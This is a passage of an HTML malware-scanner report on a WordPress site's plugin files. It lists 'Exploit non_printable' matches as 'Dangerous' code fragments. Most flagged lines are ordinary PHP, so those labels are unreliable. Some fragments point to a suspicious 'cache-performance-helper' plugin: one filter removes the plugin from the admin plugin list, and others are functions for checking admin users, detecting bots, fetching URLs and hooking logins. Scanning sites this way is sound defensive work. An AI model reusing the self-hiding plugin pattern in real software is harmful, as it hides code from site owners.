</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_db_config_snippet</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">db_credentials_empty</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 985</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$found</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 987</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dump_input_from_post</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_528").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/cache-performance-helper/cache-performance-helper.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.17 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 17:12:20</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 17:12:20</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 24</span><br><table id="file_529" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$p</span><span style="color: #007700">) { unset(</span><span style="color: #0000BB">$p</span><span style="color: #007700">[</span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">)]); return </span><span style="color: #0000BB">$p</span><span style="color: #007700">; });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'curl_version'</span><span style="color: #007700">) ? </span><span style="color: #0000BB">curl_version</span><span style="color: #007700">()[</span><span style="color: #DD0000">'version'</span><span style="color: #007700">] : </span><span style="color: #DD0000">'N/A'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){try{</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 133</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return;</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 143</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$p</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$p</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hft_is_admin_user</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'current_user_can'</span><span style="color: #007700">) && </span><span style="color: #0000BB">current_user_can</span><span style="color: #007700">(</span><span style="color: #DD0000">'manage_options'</span><span style="color: #007700">)) return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hft_is_bot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hft_clean_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$str</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hft_get_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$debug </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$debug </span><span style="color: #007700">? </span><span style="color: #0000BB">$debug_info </span><span style="color: #007700">: </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'curl_init'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'curl_init'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'wp_remote_get'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 83</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$debug_info</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 86</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$clean</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$user_login</span><span style="color: #007700">, </span><span style="color: #0000BB">$user</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_529").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/includes/class-xwork-i18n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 852.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_530" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() { </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">( </span><span style="color: #DD0000">'xwork'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) ) ) . </span><span style="color: #DD0000">'/languages/' </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_530").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/includes/class-xwork-loader.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.71 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_531" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">filters </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">], array( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'component'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'callback'</span><span style="color: #007700">] ), </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'accepted_args'</span><span style="color: #007700">] ); } foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">actions </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">],</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to execute the </span><span style="color: #007700">list </span><span style="color: #0000BB">of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">definition on the $component</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should be fired</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that is used to register the actions </span><span style="color: #007700">and </span><span style="color: #0000BB">hooks into a single</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">The collection of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters registered with WordPress</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 98</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_531").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/includes/class-xwork.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 19</span><br><table id="file_532" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">-></span><span style="color: #0000BB">run</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dependencies</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_locale</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">define_admin_hooks</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">define_public_hooks</span><span style="color: #007700">() {</span>
</span>
